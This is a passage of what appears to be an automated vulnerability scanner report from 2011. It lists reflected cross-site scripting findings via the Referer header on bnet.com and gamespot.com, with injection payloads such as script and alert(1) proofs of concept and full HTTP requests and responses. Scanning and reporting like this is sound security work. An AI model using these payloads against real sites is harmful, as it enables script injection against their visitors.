<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<me
...[SNIP]...
dlog.com.com/adlog/i/r=17626&sg=1815&o=1%253A&h=cn&p=&b=14&l=&site=252&pt=2001&nd=1&pid=&cid=0&pp=100&e=&rqid=00c13-ad-e3:4DB85A3B5596DA&orh=2e021"><a>106e1ea1801&ort=&oepartner=&epartner=&ppartner=&pdom=2e021">
...[SNIP]...

3.823. http://moneywatch.bnet.com/money-library/ [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://moneywatch.bnet.com
Path:	/money-library/

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1fe6b"><a>62c0590665b was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /money-library/?tag=nav;n-moneyLibrary HTTP/1.1
Host: moneywatch.bnet.com
Proxy-Connection: keep-alive
Referer: 1fe6b"><a>62c0590665b
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: geo-data=%7B%22region%22%3A%22vt%22%2C%22connectionspeed%22%3A%22broadband%22%2C%22regionconf%22%3A%225%22%2C%22metrocode%22%3A%22523%22%2C%22longittude%22%3A%22-72.646%22%2C%22countrycode%22%3A%22840%22%2C%22continentcode%22%3A%226%22%2C%22countryconf%22%3A%225%22%2C%22country%22%3A%22usa%22%2C%22city%22%3A%22stowe%22%2C%22cityconf%22%3A%225%22%2C%22citycode%22%3A%227029%22%2C%22domain%22%3A%22BNET%22%2C%22regioncode%22%3A%2246%22%2C%22latitude%22%3A%2244.5%22%7D; __qca=P0-1524123015-1303946493098; AxData=; Axxd=1; MADTEST=1; __csref=http%3A%2F%2Fwww.cbsnews.com%2F8301-503544_162-20057854-503544.html%3Ftag%3Dstrip; XCLGFbrowser=Cg8JIk24ijttAAAASDs; MAD_FIRSTPAGE=0; reg-overlay=1; __cst=83114897b6b32000; __csv=6522d442e56f04a6|0; __csnv=99f1e31378d3bbd8; __ctl=6522d442e56f04a61; __utmz=243208273.1303947475.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=243208273.1169385470.1303947475.1303947475.1303947475.1; __utmc=243208273; __utmb=243208273.1.10.1303947475; mad_rsi_segs=ASK05540_10572&ASK05540_10573&ASK05540_10578&ASK05540_10276&ASK05540_10066&ASK05540_10174&ASK05540_10195&ASK05540_10225&ASK05540_10269&ASK05540_10279&ASK05540_10287&ASK05540_10290&ASK05540_10319&ASK05540_10354&ASK05540_10390&ASK05540_10391&ASK05540_10394&ASK05540_10395&ASK05540_10537&ASK05540_10562&ASK05540_10265&ASK05540_10249&ASK05540_10263

Response

HTTP/1.1 200 OK
Date: Wed, 27 Apr 2011 23:42:22 GMT
Server: Apache
Content-Type: text/html; charset=utf-8
Cache-Control: private
Content-Length: 66770

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<me
...[SNIP]...
m.com/adlog/i/r=15110&sg=1815&o=19548%253A&h=cn&p=&b=14&l=&site=252&pt=2001&nd=19548&pid=&cid=0&pp=100&e=&rqid=01c13-ad-e6:4DB89CF8E2C56&orh=1fe6b"><a>62c0590665b&ort=&oepartner=&epartner=&ppartner=&pdom=1fe6b">
...[SNIP]...

3.824. http://moneywatch.bnet.com/money-library/ [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://moneywatch.bnet.com
Path:	/money-library/

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ded03"><a>c58e77203e was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /money-library/?tag=nav;n-moneyLibrary HTTP/1.1
Host: moneywatch.bnet.com
Proxy-Connection: keep-alive
Referer: ded03"><a>c58e77203e
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: geo-data=%7B%22region%22%3A%22vt%22%2C%22connectionspeed%22%3A%22broadband%22%2C%22regionconf%22%3A%225%22%2C%22metrocode%22%3A%22523%22%2C%22longittude%22%3A%22-72.646%22%2C%22countrycode%22%3A%22840%22%2C%22continentcode%22%3A%226%22%2C%22countryconf%22%3A%225%22%2C%22country%22%3A%22usa%22%2C%22city%22%3A%22stowe%22%2C%22cityconf%22%3A%225%22%2C%22citycode%22%3A%227029%22%2C%22domain%22%3A%22BNET%22%2C%22regioncode%22%3A%2246%22%2C%22latitude%22%3A%2244.5%22%7D; __qca=P0-1524123015-1303946493098; AxData=; Axxd=1; MADTEST=1; __csref=http%3A%2F%2Fwww.cbsnews.com%2F8301-503544_162-20057854-503544.html%3Ftag%3Dstrip; XCLGFbrowser=Cg8JIk24ijttAAAASDs; MAD_FIRSTPAGE=0; reg-overlay=1; __cst=83114897b6b32000; __csv=6522d442e56f04a6|0; __csnv=99f1e31378d3bbd8; __ctl=6522d442e56f04a61; __utmz=243208273.1303947475.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=243208273.1169385470.1303947475.1303947475.1303947475.1; __utmc=243208273; __utmb=243208273.1.10.1303947475; mad_rsi_segs=ASK05540_10572&ASK05540_10573&ASK05540_10578&ASK05540_10276&ASK05540_10066&ASK05540_10174&ASK05540_10195&ASK05540_10225&ASK05540_10269&ASK05540_10279&ASK05540_10287&ASK05540_10290&ASK05540_10319&ASK05540_10354&ASK05540_10390&ASK05540_10391&ASK05540_10394&ASK05540_10395&ASK05540_10537&ASK05540_10562&ASK05540_10265&ASK05540_10249&ASK05540_10263

Response

HTTP/1.1 200 OK
Date: Wed, 27 Apr 2011 23:42:42 GMT
Server: Apache
Content-Type: text/html; charset=utf-8
Cache-Control: private
Content-Length: 69512

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<me
...[SNIP]...
om/adlog/e/r=19694&sg=484516&o=19548%253A&h=cn&p=&b=14&l=&site=252&pt=2001&nd=19548&pid=&cid=0&pp=200&e=&rqid=01c13-ad-e7:4DB847AA6F9B3C&orh=ded03"><a>c58e77203e&oepartner=&epartner=&ppartner=&pdom=ded03">
...[SNIP]...

3.825. http://www.bnet.com/ [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.bnet.com
Path:	/

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bbc9c"><a>2078c83a841 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET / HTTP/1.1
Host: www.bnet.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: geo-data=%7B%22region%22%3A%22vt%22%2C%22connectionspeed%22%3A%22broadband%22%2C%22regionconf%22%3A%225%22%2C%22metrocode%22%3A%22523%22%2C%22longittude%22%3A%22-72.646%22%2C%22countrycode%22%3A%22840%22%2C%22continentcode%22%3A%226%22%2C%22countryconf%22%3A%225%22%2C%22country%22%3A%22usa%22%2C%22city%22%3A%22stowe%22%2C%22cityconf%22%3A%225%22%2C%22citycode%22%3A%227029%22%2C%22domain%22%3A%22BNET%22%2C%22regioncode%22%3A%2246%22%2C%22latitude%22%3A%2244.5%22%7D; MAD_FIRSTPAGE=1; __qca=P0-1524123015-1303946493098; AxData=; Axxd=1; MADTEST=1; __utmz=265262096.1303946497.1.1.utmcsr=cbsnews.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-503544_162-20057854-503544.html; __utma=265262096.2096736639.1303946497.1303946497.1303946497.1; __utmc=265262096; __utmb=265262096.1.10.1303946497; mad_rsi_segs=ASK05540_10572&ASK05540_10573&ASK05540_10578&ASK05540_10276&ASK05540_10066&ASK05540_10174&ASK05540_10195&ASK05540_10225&ASK05540_10269&ASK05540_10287&ASK05540_10290&ASK05540_10354&ASK05540_10394&ASK05540_10395&ASK05540_10537&ASK05540_10562; XCLGFbrowser=Cg8JIk24ijttAAAASDs
Referer: bbc9c"><a>2078c83a841

Response

HTTP/1.1 200 OK
Date: Wed, 27 Apr 2011 23:36:57 GMT
Server: Apache
Content-Type: text/html; charset=utf-8
Cache-Control: private
Content-Length: 92149

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<
...[SNIP]...
og/i/r=10165&sg=1815&o=13054%253A13113%253A&h=cn&p=&b=14&l=&site=23&pt=2404&nd=13113&pid=&cid=0&pp=100&e=&rqid=01c13-ad-e6:4DB89CF8CCBE0&orh=bbc9c"><a>2078c83a841&ort=&oepartner=&epartner=&ppartner=&pdom=bbc9c">
...[SNIP]...

3.826. http://www.bnet.com/ [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.bnet.com
Path:	/

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8b604"-alert(1)-"60f706924d was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

Response

HTTP/1.1 200 OK
Date: Wed, 27 Apr 2011 23:37:19 GMT
Server: Apache
Content-Type: text/html; charset=utf-8
Cache-Control: private
Content-Length: 92549

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<
...[SNIP]...
c/r=15014&sg=504986&o=13054%253A13113%253A&h=cn&p=&b=14&l=&site=23&pt=2404&nd=13113&pid=&cid=0&pp=100&e=&rqid=00c13-ad-e6:4DB88897245CD6&orh=8b604"-alert(1)-"60f706924d&oepartner=&epartner=&ppartner=&pdom=8b604"-alert(1)-"60f706924d&cpnmodule=&count=&ra=173.193.214.243&pg=6-Gz7goPOVMAAH8fk-UAAAAj&t=2011.04.27.23.37.19/http://ad.dou
...[SNIP]...

3.827. http://www.bnet.com/management [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.bnet.com
Path:	/management

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d6026"><a>422c83d9cf3 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /management?tag=hdr-management HTTP/1.1
Host: www.bnet.com
Proxy-Connection: keep-alive
Referer: d6026"><a>422c83d9cf3
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: geo-data=%7B%22region%22%3A%22vt%22%2C%22connectionspeed%22%3A%22broadband%22%2C%22regionconf%22%3A%225%22%2C%22metrocode%22%3A%22523%22%2C%22longittude%22%3A%22-72.646%22%2C%22countrycode%22%3A%22840%22%2C%22continentcode%22%3A%226%22%2C%22countryconf%22%3A%225%22%2C%22country%22%3A%22usa%22%2C%22city%22%3A%22stowe%22%2C%22cityconf%22%3A%225%22%2C%22citycode%22%3A%227029%22%2C%22domain%22%3A%22BNET%22%2C%22regioncode%22%3A%2246%22%2C%22latitude%22%3A%2244.5%22%7D; __qca=P0-1524123015-1303946493098; AxData=; Axxd=1; MADTEST=1; XCLGFbrowser=Cg8JIk24ijttAAAASDs; MAD_FIRSTPAGE=0; reg-overlay=1; __csref=; __cst=8ba060fac4a1daa4; __csv=6522d442e56f04a6|0; __csnv=31922dab8de41511; __ctl=6522d442e56f04a61; __utmz=265262096.1303947390.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=265262096.1982425901.1303947390.1303947390.1303947390.1; __utmc=265262096; __utmb=265262096.1.10.1303947390; mad_rsi_segs=ASK05540_10572&ASK05540_10573&ASK05540_10578&ASK05540_10276&ASK05540_10066&ASK05540_10174&ASK05540_10195&ASK05540_10225&ASK05540_10269&ASK05540_10287&ASK05540_10290&ASK05540_10354&ASK05540_10390&ASK05540_10391&ASK05540_10394&ASK05540_10395&ASK05540_10537&ASK05540_10562

Response

HTTP/1.1 200 OK
Date: Wed, 27 Apr 2011 23:42:38 GMT
Server: Apache
Content-Type: text/html; charset=utf-8
Cache-Control: private
Content-Length: 117998

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<
...[SNIP]...
.com/adlog/e/r=18501&sg=484518&o=32167%253A&h=cn&p=&b=14&l=&site=23&pt=2405&nd=32167&pid=&cid=0&pp=100&e=&rqid=01c13-ad-e6:4DB89CF8E3D1B&orh=d6026"><a>422c83d9cf3&oepartner=&epartner=&ppartner=&pdom=d6026">
...[SNIP]...

3.828. http://www.bnet.com/management [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.bnet.com
Path:	/management

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 18586"><a>f995bfc4fc1 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /management?tag=hdr-management HTTP/1.1
Host: www.bnet.com
Proxy-Connection: keep-alive
Referer: 18586"><a>f995bfc4fc1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: geo-data=%7B%22region%22%3A%22vt%22%2C%22connectionspeed%22%3A%22broadband%22%2C%22regionconf%22%3A%225%22%2C%22metrocode%22%3A%22523%22%2C%22longittude%22%3A%22-72.646%22%2C%22countrycode%22%3A%22840%22%2C%22continentcode%22%3A%226%22%2C%22countryconf%22%3A%225%22%2C%22country%22%3A%22usa%22%2C%22city%22%3A%22stowe%22%2C%22cityconf%22%3A%225%22%2C%22citycode%22%3A%227029%22%2C%22domain%22%3A%22BNET%22%2C%22regioncode%22%3A%2246%22%2C%22latitude%22%3A%2244.5%22%7D; __qca=P0-1524123015-1303946493098; AxData=; Axxd=1; MADTEST=1; XCLGFbrowser=Cg8JIk24ijttAAAASDs; MAD_FIRSTPAGE=0; reg-overlay=1; __csref=; __cst=8ba060fac4a1daa4; __csv=6522d442e56f04a6|0; __csnv=31922dab8de41511; __ctl=6522d442e56f04a61; __utmz=265262096.1303947390.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=265262096.1982425901.1303947390.1303947390.1303947390.1; __utmc=265262096; __utmb=265262096.1.10.1303947390; mad_rsi_segs=ASK05540_10572&ASK05540_10573&ASK05540_10578&ASK05540_10276&ASK05540_10066&ASK05540_10174&ASK05540_10195&ASK05540_10225&ASK05540_10269&ASK05540_10287&ASK05540_10290&ASK05540_10354&ASK05540_10390&ASK05540_10391&ASK05540_10394&ASK05540_10395&ASK05540_10537&ASK05540_10562

Response

HTTP/1.1 200 OK
Date: Wed, 27 Apr 2011 23:42:17 GMT
Server: Apache
Content-Type: text/html; charset=utf-8
Cache-Control: private
Content-Length: 118002

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<
...[SNIP]...
m.com/adlog/i/r=10166&sg=1815&o=32167%253A&h=cn&p=&b=14&l=&site=23&pt=2405&nd=32167&pid=&cid=0&pp=100&e=&rqid=00c13-ad-e3:4DB85A3B5A7E38&orh=18586"><a>f995bfc4fc1&ort=&oepartner=&epartner=&ppartner=&pdom=18586">
...[SNIP]...

3.829. http://www.bnet.com/management [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.bnet.com
Path:	/management

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 44ff5"-alert(1)-"88dac629641 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

GET /management?tag=hdr-management HTTP/1.1
Host: www.bnet.com
Proxy-Connection: keep-alive
Referer: 44ff5"-alert(1)-"88dac629641
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: geo-data=%7B%22region%22%3A%22vt%22%2C%22connectionspeed%22%3A%22broadband%22%2C%22regionconf%22%3A%225%22%2C%22metrocode%22%3A%22523%22%2C%22longittude%22%3A%22-72.646%22%2C%22countrycode%22%3A%22840%22%2C%22continentcode%22%3A%226%22%2C%22countryconf%22%3A%225%22%2C%22country%22%3A%22usa%22%2C%22city%22%3A%22stowe%22%2C%22cityconf%22%3A%225%22%2C%22citycode%22%3A%227029%22%2C%22domain%22%3A%22BNET%22%2C%22regioncode%22%3A%2246%22%2C%22latitude%22%3A%2244.5%22%7D; __qca=P0-1524123015-1303946493098; AxData=; Axxd=1; MADTEST=1; XCLGFbrowser=Cg8JIk24ijttAAAASDs; MAD_FIRSTPAGE=0; reg-overlay=1; __csref=; __cst=8ba060fac4a1daa4; __csv=6522d442e56f04a6|0; __csnv=31922dab8de41511; __ctl=6522d442e56f04a61; __utmz=265262096.1303947390.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=265262096.1982425901.1303947390.1303947390.1303947390.1; __utmc=265262096; __utmb=265262096.1.10.1303947390; mad_rsi_segs=ASK05540_10572&ASK05540_10573&ASK05540_10578&ASK05540_10276&ASK05540_10066&ASK05540_10174&ASK05540_10195&ASK05540_10225&ASK05540_10269&ASK05540_10287&ASK05540_10290&ASK05540_10354&ASK05540_10390&ASK05540_10391&ASK05540_10394&ASK05540_10395&ASK05540_10537&ASK05540_10562

Response

HTTP/1.1 200 OK
Date: Wed, 27 Apr 2011 23:43:01 GMT
Server: Apache
Content-Type: text/html; charset=utf-8
Cache-Control: private
Content-Length: 118535

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<
...[SNIP]...
com/adlog/c/r=18496&sg=485308&o=32167%253A&h=cn&p=&b=14&l=&site=23&pt=2405&nd=32167&pid=&cid=0&pp=100&e=&rqid=00c13-ad-e7:4DB8339E856F36&orh=44ff5"-alert(1)-"88dac629641&oepartner=&epartner=&ppartner=&pdom=44ff5"-alert(1)-"88dac629641&cpnmodule=&count=&ra=173.193.214.243&pg=AFKI2AoPOVMAAH8Wi@cAAAAa&t=2011.04.27.23.43.01/http://ad.do
...[SNIP]...

3.830. http://www.gamespot.com/ [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.gamespot.com
Path:	/

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 95682"><a>d0db82c9dfe was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET / HTTP/1.1
Host: www.gamespot.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Referer: 95682"><a>d0db82c9dfe

Response

HTTP/1.1 200 OK
Date: Wed, 27 Apr 2011 23:37:50 GMT
Server: Apache
Accept-Ranges: bytes
X-Powered-By: PHP/5.2.5
Set-Cookie: geolocn=MTczLjE5My4yMTQuMjQzOjg0MA%3D%3D; expires=Fri, 27-May-2011 23:37:50 GMT; path=/; domain=.gamespot.com
Set-Cookie: ctk=NGRiOGE4Y2VhZGMxZDZmM2U5ZDg1MTVjNDYzNA%3D%3D; expires=Mon, 24-Oct-2011 23:37:50 GMT; path=/; domain=.gamespot.com
Set-Cookie: gspot_promo_042711=1; expires=Sat, 30-Apr-2011 23:37:51 GMT; path=/; domain=.gamespot.com
Set-Cookie: gspot_side_042711=1; expires=Sat, 30-Apr-2011 23:37:51 GMT; path=/; domain=.gamespot.com
Set-Cookie: hello_from_gs=1; path=/; domain=.gamespot.com
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 102705

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
/adlog.com.com/adlog/e/r=13369&sg=511584&o=1%253A&h=cn&p=&b=4&l=&site=6&pt=2000&nd=1&pid=&cid=&pp=100&e=&rqid=00c13-ad-e3:4DB85A3B595E8E&orh=95682"><a>d0db82c9dfe&oepartner=&epartner=&ppartner=&pdom=95682">
...[SNIP]...

3.831. http://www.gamespot.com/ [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.gamespot.com
Path:	/

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 404d7"><script>alert(1)</script>0aaaf7a5cc1 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

Response

HTTP/1.1 200 OK
Date: Wed, 27 Apr 2011 23:37:49 GMT
Server: Apache
Accept-Ranges: bytes
X-Powered-By: PHP/5.2.5
Set-Cookie: geolocn=MTczLjE5My4yMTQuMjQzOjg0MA%3D%3D; expires=Fri, 27-May-2011 23:37:49 GMT; path=/; domain=.gamespot.com
Set-Cookie: ctk=NGRiOGE4Y2RhZGMxZDZmM2YxMTg1N2EwYzhmNg%3D%3D; expires=Mon, 24-Oct-2011 23:37:49 GMT; path=/; domain=.gamespot.com
Set-Cookie: gspot_promo_042711=1; expires=Sat, 30-Apr-2011 23:37:49 GMT; path=/; domain=.gamespot.com
Set-Cookie: gspot_side_042711=1; expires=Sat, 30-Apr-2011 23:37:49 GMT; path=/; domain=.gamespot.com
Set-Cookie: hello_from_gs=1; path=/; domain=.gamespot.com
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 101789

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
1',PD:'0',xref:'http%3A%2F%2Fwww.google.com%2Fsearch',_unsafe_xref:'http://www.google.com/search',xrq:'hl%3Den%26q%3D404d7%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E0aaaf7a5cc1',_unsafe_xrq:'hl=en&q=404d7"><script>alert(1)</script>0aaaf7a5cc1',edid:'107',ts:'1303947469',oid:'2000-1_6-0-0',ld:'www.gamespot.com',clgf:'',globid:'',url:'http%3A%2F%2Fwww.gamespot.com%2F',_unsafe_url:'http://www.gamespot.com/'}}">
...[SNIP]...

3.832. http://www.gamespot.com/games.html [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.gamespot.com
Path:	/games.html

Issue detail

